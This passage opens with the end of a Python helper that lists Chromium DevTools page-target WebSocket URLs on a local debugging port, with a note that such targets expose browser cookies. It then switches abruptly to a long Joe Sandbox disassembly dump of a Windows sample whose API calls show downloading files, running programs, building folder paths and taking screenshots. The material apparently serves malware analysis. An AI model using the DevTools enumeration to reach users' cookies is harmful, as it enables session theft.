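    No JSON parser involved, so it also works on truncated bodies."""
    urls = []
    pos = 0
    while True:
        key = body.find(KEY_MARKER, pos)
        if key < 0:
            break
        start = body.find(WS_MARKER, key)
        if start < 0:
            break
        start += 1                      # step over the opening quote
        end = body.find('"', start)
        if end < 0:
            break
        urls.append(body[start:end])
        pos = end
    return urls


def parse_targets(body: str) -> list:
    """Strict parse of the same response: one dict per target that
    advertises a debugger socket."""
    return [
        {"type": t.get("type"), "url": t.get("url"),
         "ws": t.get("webSocketDebuggerUrl")}
        for t in json.loads(body) if "webSocketDebuggerUrl" in t
    ]


def page_targets(body: str) -> list:
    """ws:// endpoints of page targets only; a DevTools session on a page
    target is what exposes that profile's cookies to a client."""
    return [t["ws"] for t in parse_targets(body) if t["type"] == "page"]


def probe_local_devtools(port: int = 9229, timeout: float = 1.0):
    """Host check: return the targets a local debugger advertises on
    http://localhost:<port>/json, or None when nothing answers. A browser
    started with a remote-debugging port answers this with the data above."""
    try:
        with urllib.request.urlopen(
                f"http://localhost:{port}/json", timeout=timeout) as resp:
            return parse_targets(resp.read().decode("utf-8", "replace"))
    except (URLError, OSError, ValueError):
        return None


if __name__ == "__main__":
    print("marker scan :", scan_ws_urls(SAMPLE_JSON))
    print("page targets:", page_targets(SAMPLE_JSON))
    print("local probe :", probe_local_devtools())
```

The marker scan is deliberately loose, which is the point of showing it: it does not care about JSON validity, and a value that is not ws:// makes it skip to the next ws:// literal in the body, so the strict parse is the one to use when the result matters. Running probe_local_devtools on an endpoint host that returns a non-None list means a browser or runtime is exposing its debugging port to every local process, which is the precondition this sample relies on.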
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00901871
                            • lstrcpy.KERNEL32(00000000,012EA840), ref: 0090189C
                            • lstrlen.KERNEL32(?), ref: 009018A9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 009018C6
                            • lstrcat.KERNEL32(00000000,?), ref: 009018D4
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 009018FA
                            • lstrlen.KERNEL32(012FEB28), ref: 0090190F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00901932
                            • lstrcat.KERNEL32(00000000,012FEB28), ref: 0090193A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00901962
                            • ShellExecuteEx.SHELL32(?), ref: 0090199D
                            • ExitProcess.KERNEL32 ref: 009019D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                            • String ID: <
                            • API String ID: 3579039295-4251816714
                            • Opcode ID: a1af46575304b8881caacd125ba18cd448ef814b71ab0c5467da73b9ebfa78e2
                            • Instruction ID: 07f39e94539c7c7a734f11c4691f6cc9b40e3aca4bc0eeb8fc5ddc30b338bb3c
                            • Opcode Fuzzy Hash: a1af46575304b8881caacd125ba18cd448ef814b71ab0c5467da73b9ebfa78e2
                            • Instruction Fuzzy Hash: E4513B71901259AFDB21EFA9DC94ADEBBFDBF48300F548125A915E3291DF70AF018B90
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FF1C4
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FF1F2
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 008FF206
                            • lstrlen.KERNEL32(00000000), ref: 008FF215
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 008FF233
                            • StrStrA.SHLWAPI(00000000,?), ref: 008FF261
                            • lstrlen.KERNEL32(?), ref: 008FF274
                            • lstrlen.KERNEL32(00000000), ref: 008FF292
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 008FF2DF
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 008FF31F
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$AllocLocal
                            • String ID: ERROR
                            • API String ID: 1803462166-2861137601
                            • Opcode ID: 2cb42e562e904be733e2c5a798c4435e13f7bdc3c5064c9c5cd56ef168b67abf
                            • Instruction ID: e3bd54b9d4c9a94419b496d41cc317d73ea2a9637b51ae03876d7d10ae6bb373
                            • Opcode Fuzzy Hash: 2cb42e562e904be733e2c5a798c4435e13f7bdc3c5064c9c5cd56ef168b67abf
                            • Instruction Fuzzy Hash: 9051BF36A101999FCB22AF39DC49ABE77A8FF45710F044574EA1ADB252DB70DC018791
                            APIs
                            • GetEnvironmentVariableA.KERNEL32(012F9100,00B19BD8,0000FFFF), ref: 008EA026
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008EA053
                            • lstrlen.KERNEL32(00B19BD8), ref: 008EA060
                            • lstrcpy.KERNEL32(00000000,00B19BD8), ref: 008EA08A
                            • lstrlen.KERNEL32(00914C50), ref: 008EA095
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EA0B2
                            • lstrcat.KERNEL32(00000000,00914C50), ref: 008EA0BE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EA0E4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008EA0EF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EA114
                            • SetEnvironmentVariableA.KERNEL32(012F9100,00000000), ref: 008EA12F
                            • LoadLibraryA.KERNEL32(012E6458), ref: 008EA143
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                            • String ID:
                            • API String ID: 2929475105-0
                            • Opcode ID: f0fb3b7f92b05585ae6c4041c83e453e3566e001facc99cf1baa446f95b0d27e
                            • Instruction ID: 3c3f4c60cd1ebfb797145d76bf9b7ee2abf7e121caff0b814bc4227b8aee16f9
                            • Opcode Fuzzy Hash: f0fb3b7f92b05585ae6c4041c83e453e3566e001facc99cf1baa446f95b0d27e
                            • Instruction Fuzzy Hash: F491E531600A809FD7349FBADC84AA637A5FB56B04F808428E505D7261EFB5ED80CB93
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FCA92
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008FCAC1
                            • lstrlen.KERNEL32(00000000), ref: 008FCAEC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008FCB22
                            • StrCmpCA.SHLWAPI(00000000,00911C80), ref: 008FCB33
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: e1ff8144c709c0fa8ae1b253d68c34fe7a518dcb11d1e499e31fbab79b7216ce
                            • Instruction ID: 3f537d5843f8821d157aba715aab75976da52acb57e5876ec5b9291914edf8b1
                            • Opcode Fuzzy Hash: e1ff8144c709c0fa8ae1b253d68c34fe7a518dcb11d1e499e31fbab79b7216ce
                            • Instruction Fuzzy Hash: 3561C47190026EAFCB10DFB5CA85AFE7BB8FF09700F044565E945E7201EB749E418791
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00900EC0), ref: 00904486
                            • GetDesktopWindow.USER32 ref: 00904490
                            • GetWindowRect.USER32(00000000,?), ref: 0090449D
                            • SelectObject.GDI32(00000000,00000000), ref: 009044CF
                            • GetHGlobalFromStream.COMBASE(00900EC0,?), ref: 00904546
                            • GlobalLock.KERNEL32(?), ref: 00904550
                            • GlobalSize.KERNEL32(?), ref: 0090455D
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                            • String ID:
                            • API String ID: 1264946473-0
                            • Opcode ID: 01ccab1df1ef228f1571792ac6d798eb0830c808a8498a319f132028d6edb90b
                            • Instruction ID: b63e92b71209ec248f7ac875cdb91695328b2a90166d1d6719602de62083a185
                            • Opcode Fuzzy Hash: 01ccab1df1ef228f1571792ac6d798eb0830c808a8498a319f132028d6edb90b
                            • Instruction Fuzzy Hash: 36511C75A10208AFDB10DFA8DD89EEEB7B9FF48700F504529F905E7250DA74AE01CBA1
                            APIs
                            • lstrcat.KERNEL32(?,012FF768), ref: 008FE1ED
                            • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 008FE217
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE24F
                            • lstrcat.KERNEL32(?,00000000), ref: 008FE25D
                            • lstrcat.KERNEL32(?,?), ref: 008FE278
                            • lstrcat.KERNEL32(?,?), ref: 008FE28C
                            • lstrcat.KERNEL32(?,012EA7F0), ref: 008FE2A0
                            • lstrcat.KERNEL32(?,?), ref: 008FE2B4
                            • lstrcat.KERNEL32(?,012FE380), ref: 008FE2C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE2FF
                            • GetFileAttributesA.KERNEL32(00000000), ref: 008FE306
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 4230089145-0
                            • Opcode ID: b126233d7e5f0cc89093de88a5e2fd583c38626e1f107a6d9b962ec15cc0a726
                            • Instruction ID: d634084d662159239b4182ad3ee0e3270404c91a3ee742c84bf43c40b665d803
                            • Opcode Fuzzy Hash: b126233d7e5f0cc89093de88a5e2fd583c38626e1f107a6d9b962ec15cc0a726
                            • Instruction Fuzzy Hash: 7E614D7191016CABCB55DB64DC58AED77B9FF48300F5089A9B60AE3250EF709F858F90
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008E6AFF
                            • InternetOpenA.WININET(0090CFF4,00000001,00000000,00000000,00000000), ref: 008E6B2C
                            • StrCmpCA.SHLWAPI(?,012FFAC8), ref: 008E6B4A
                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 008E6B6A
                            • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008E6B88
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 008E6BA1
                            • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 008E6BC6
                            • InternetReadFile.WININET(00000000,?,00000400,?), ref: 008E6BF0
                            • CloseHandle.KERNEL32(00000000), ref: 008E6C10
                            • InternetCloseHandle.WININET(00000000), ref: 008E6C17
                            • InternetCloseHandle.WININET(?), ref: 008E6C21
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            • API ID: Internet$File$CloseHandle$OpenRead$CreateWritelstrcpy
                            • String ID:
                            • API String ID: 2500263513-0
                            • Opcode ID: 9ab051a9bbafce6f6486e2bff818fb6e30e8a97388e0dd015535222fdbffc259
                            • Instruction ID: c7479c1c886554002643c16de6254413851547825ca61d15ace2742fa8df5ea6
                            • Opcode Fuzzy Hash: 9ab051a9bbafce6f6486e2bff818fb6e30e8a97388e0dd015535222fdbffc259
                            • Instruction Fuzzy Hash: C641A171A00205ABDB20DF65DC89FEE77B8FB54740F448464FA05E7280EF70AE418BA4
                            APIs
                            • lstrcpy.KERNEL32(00000000,0090CFF4), ref: 008EBC1F
                            • lstrlen.KERNEL32(00000000), ref: 008EBC52
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EBC7C
                            • lstrcat.KERNEL32(00000000,00000000), ref: 008EBC84
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 008EBCAC
                            • lstrlen.KERNEL32(00914ADC), ref: 008EBD23
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 05b00036605fab8a67a7c053c66ae4722f756e430f5d2cb9dc03e444425c4616
                            • Instruction ID: 3ad661143d642e531003685533fcdcc38c9b948fba3b64df4f4467d79dc6a202
                            • Opcode Fuzzy Hash: 05b00036605fab8a67a7c053c66ae4722f756e430f5d2cb9dc03e444425c4616
                            • Instruction Fuzzy Hash: C3A19031A012859FCB25EF6ADD49AAFB7B4FF46304F288069E405EB261DB71DC42CB51
                            APIs
                            • std::_Xinvalid_argument.LIBCPMT ref: 0090613A
                            • std::_Xinvalid_argument.LIBCPMT ref: 00906159
                            • memmove.MSVCRT(00000000,00000000,FFFFFFFF,?,?,00000000), ref: 00906224
                            • memmove.MSVCRT(00000000,00000000,?), ref: 009062AF
                            • std::_Xinvalid_argument.LIBCPMT ref: 009062E0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2276297056.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                            • Associated: 00000001.00000002.2276280362.00000000008E0000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000917000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000096E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000976000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.000000000098F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276297056.0000000000B18000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276509130.0000000000B2A000.00000008.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000B2C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000CB3000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000D92000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DBB000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DC2000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276526365.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2276987124.0000000000DD2000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277135726.0000000000F6C000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.2277156887.0000000000F6D000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_8e0000_file.jbxd
                            • API ID: Xinvalid_argumentstd::_$memmove
                            • String ID: invalid string position$string too long
                            • API String ID: 1975243496-4289949731
                            • Opcode ID: e46234bc25d4628fc49411e88dd13fb9d154f210621c7d218351553351110146
                            • Instruction ID: 18f8de3d3d0952a15eaf9398dad5853160ce151c1be0aeca91b1bee6e2c00904
                            • Opcode Fuzzy Hash: e46234bc25d4628fc49411e88dd13fb9d154f210621c7d218351553351110146
                            • Instruction Fuzzy Hash: 17616D70714205DFDB18CF9CD891A6EB7B6EF85704B244919E4A2CB3C2C730ADA09B95
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE24F
                            • lstrcat.KERNEL32(?,00000000), ref: 008FE25D
                            • lstrcat.KERNEL32(?,?), ref: 008FE278
                            • lstrcat.KERNEL32(?,?), ref: 008FE28C
                            • lstrcat.KERNEL32(?,012EA7F0), ref: 008FE2A0
                            • lstrcat.KERNEL32(?,?), ref: 008FE2B4
                            • lstrcat.KERNEL32(?,012FE380), ref: 008FE2C7
                            • lstrcpy.KERNEL32(00000000,?), ref: 008FE2FF
                            • GetFileAttributesA.KERNEL32(00000000), ref: 008FE306
                            Memory Dump Source
